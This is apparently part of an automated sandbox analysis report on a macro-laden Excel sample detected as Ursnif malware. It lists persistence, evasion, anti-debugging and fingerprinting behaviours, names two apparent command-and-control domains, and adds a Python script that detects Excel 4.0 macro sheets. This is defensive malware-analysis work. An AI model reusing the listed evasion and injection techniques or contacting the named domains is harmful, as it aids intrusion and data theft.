Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (14 occurrences)
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2216 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2680 Thread sleep time: -60000s >= -30000s
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C77FF FindFirstFileExA, 6_2_6E2C77FF

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C7327 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6E2C7327
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1552 LoadLibraryA,GetProcAddress, 6_2_6E2A1552
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C5D2F mov eax, dword ptr fs:[00000030h] 6_2_6E2C5D2F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F85B0 mov eax, dword ptr fs:[00000030h] 6_2_6E2F85B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F80E6 push dword ptr fs:[00000030h] 6_2_6E2F80E6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F84DF mov eax, dword ptr fs:[00000030h] 6_2_6E2F84DF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C36F2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6E2C36F2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C7327 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6E2C7327
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C3C18 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6E2C3C18

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: app.updatebrouser.com
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: apt.updateffboruse.com
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
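The Yara match is on docProps/app.xml of the sample, so the workbook is identified as carrying an Excel 4.0 (XLM) macro sheet from package metadata alone, before any formula is parsed. The Python below is an added example and not the Joe Sandbox rule: it inspects an OOXML container for the three places a macro sheet shows up (a part under xl/macrosheets/, its content type in [Content_Types].xml, and the heading list in docProps/app.xml). The workbooks are built in memory as constructed stand-ins rather than valid Excel files; treating any app.xml heading that contains "macro" as a hit, and the "Macro Sheets" heading text in the constructed sample, are assumptions.

```python
"""Check an Excel OOXML container (.xlsb/.xlsm/.xlsx) for Excel 4.0 macro sheets.

Added example, not the Joe Sandbox Yara rule. The workbook zips are built
in memory so the script runs offline. Part names and content types are the
ones Excel writes for macro sheets (xl/macrosheets/*, content type
application/vnd.ms-excel.macrosheet, or .macrosheet+xml for .xlsm).
Matching docProps/app.xml headings on the substring "macro" is a heuristic
assumption, as is the "Macro Sheets" heading used in the constructed sample.
"""
import io
import re
import zipfile

MACROSHEET_PART = re.compile(r"^xl/macrosheets/", re.I)
MACROSHEET_TYPE = re.compile(r'ContentType="application/vnd\.ms-excel\.macrosheet(\+xml)?"', re.I)
APP_HEADING = re.compile(r"<vt:lpstr>([^<]*macro[^<]*)</vt:lpstr>", re.I)


def xlm_indicators(blob: bytes) -> dict:
    """Return the three independent indicators; any one is enough to triage on."""
    out = {"macrosheet_parts": [], "content_type_hit": False, "app_xml_headings": []}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        names = z.namelist()
        out["macrosheet_parts"] = [n for n in names if MACROSHEET_PART.match(n)]
        if "[Content_Types].xml" in names:
            types_xml = z.read("[Content_Types].xml").decode("utf-8", "replace")
            out["content_type_hit"] = bool(MACROSHEET_TYPE.search(types_xml))
        if "docProps/app.xml" in names:
            app_xml = z.read("docProps/app.xml").decode("utf-8", "replace")
            out["app_xml_headings"] = APP_HEADING.findall(app_xml)
    return out


def has_xlm_macros(blob: bytes) -> bool:
    i = xlm_indicators(blob)
    return bool(i["macrosheet_parts"] or i["content_type_hit"] or i["app_xml_headings"])


def build_workbook(with_macrosheet: bool) -> bytes:
    """Constructed minimal .xlsb-style container; not a loadable workbook."""
    overrides = [
        '<Override PartName="/xl/workbook.bin" '
        'ContentType="application/vnd.ms-excel.sheet.binary.macroEnabled.main"/>',
        '<Override PartName="/xl/worksheets/sheet1.bin" '
        'ContentType="application/vnd.ms-excel.worksheet"/>',
    ]
    headings = ["<vt:lpstr>Worksheets</vt:lpstr>"]
    parts = {"xl/workbook.bin": b"\0", "xl/worksheets/sheet1.bin": b"\0"}
    if with_macrosheet:
        overrides.append('<Override PartName="/xl/macrosheets/sheet1.bin" '
                         'ContentType="application/vnd.ms-excel.macrosheet"/>')
        headings.append("<vt:lpstr>Macro Sheets</vt:lpstr>")   # assumed heading text
        parts["xl/macrosheets/sheet1.bin"] = b"\0"
    parts["[Content_Types].xml"] = (
        '<?xml version="1.0"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        + "".join(overrides) + "</Types>").encode()
    parts["docProps/app.xml"] = (
        "<Properties><HeadingPairs><vt:vector>" + "".join(headings)
        + "</vt:vector></HeadingPairs></Properties>").encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in parts.items():
            z.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_workbook(True)
    print(xlm_indicators(blob))
```

For an .xlsb the macro formulas themselves are BIFF12 records inside the macrosheet part, so after this triage the next step is a dedicated extractor that handles .xlsb, such as XLMMacroDeobfuscator. The sharedStrings.bin hit on the download URL under Networking shows that, in this sample, the URL was stored as a plain shared string rather than assembled at run time.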
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dll Jump to behavior
Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 6_2_6E2A105E
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A2E33 cpuid 6_2_001A2E33
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 6_2_6E2A109B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 6_2_6E2A1C6F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 6_2_001A2E33

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY